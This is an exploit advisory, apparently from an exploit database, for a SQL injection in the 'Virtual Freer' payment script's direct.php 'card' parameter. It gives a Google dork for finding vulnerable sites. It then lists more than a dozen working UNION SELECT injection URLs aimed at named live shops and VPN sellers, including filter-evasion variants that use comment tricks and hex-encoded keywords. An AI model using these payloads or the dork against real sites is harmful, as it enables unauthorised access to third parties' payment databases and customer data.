############In The Name Of God############
# Exploit Title : Virtual Freer SQL injection Vulnerability
# Exploit Author : R4SOUL
# Vendor Homepage : http://freer.ir/
# Google Dork : site:.ir inurl:direct.php?card=
# Date: 2016 26 January
# Tested On : Win 10 / Google Chrome / Mozilla Firefox
###########################################
# PoC: http://behtarinservice.cf/shop/direct.php?card=[SQLI]&qty=1
#
# demos :
# http://behtarinservice.cf/shop/direct.php?card=-2%22+union+select+1,version(),3,4,5,6,7,8,9,10,11,12--%20-&qty=1
# http://inet2.ir/direct.php?card=-9%22+union+select+1,version(),3,4,5,6,7,8,9,10,11,12--%20-&qty=1
# http://lebes.ir/pay/direct.php?qty=1&card=3%22+union+select+1,version(),3,4,5,6,7,8,9,10,11,12-- -
# http://www.milanvpn50.tk/boy/direct.php?qty=1&card=-16%22+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13--%20-
# http://www.nextvpn.in/pay/direct.php?card=-2%22+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14--%20-&qty=1
# http://www.nikaserver.ir/direct.php?card=-38%22+/*!50000union*/+select+1,version(),3,4,5,6,7,8,9,10,11,12--%20-&qty=1
# http://pay.freer.ir/direct.php?card=-5%22+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13--%20-&qty=1
# http://viberbazar.ir/payment/direct.php?card=-1%22+union+select+1,version(),3,4,5,6,7,8,9,10,11,12--%20-&qty=1
# http://shop.digiping.ir/direct.php?card=-91%22+un%69on+s%65lect+1,version%28%29,3,4,5,6,7,8,9,10,11,12-- -&qty=1
# http://www.sabzandishan.ir/shop/direct.php?card=-64%22+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13--%20-&qty=1
# http://shop.mihannod.ir/direct.php?card=-15%22+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14--%20-&qty=1
# http://www.nextvpn.in/pay/direct.php?card=-2%22+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14--%20-&qty=1
# http://store.parseset.ir/direct.php?card=-3%22+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14--%20-&qty=1
###########################################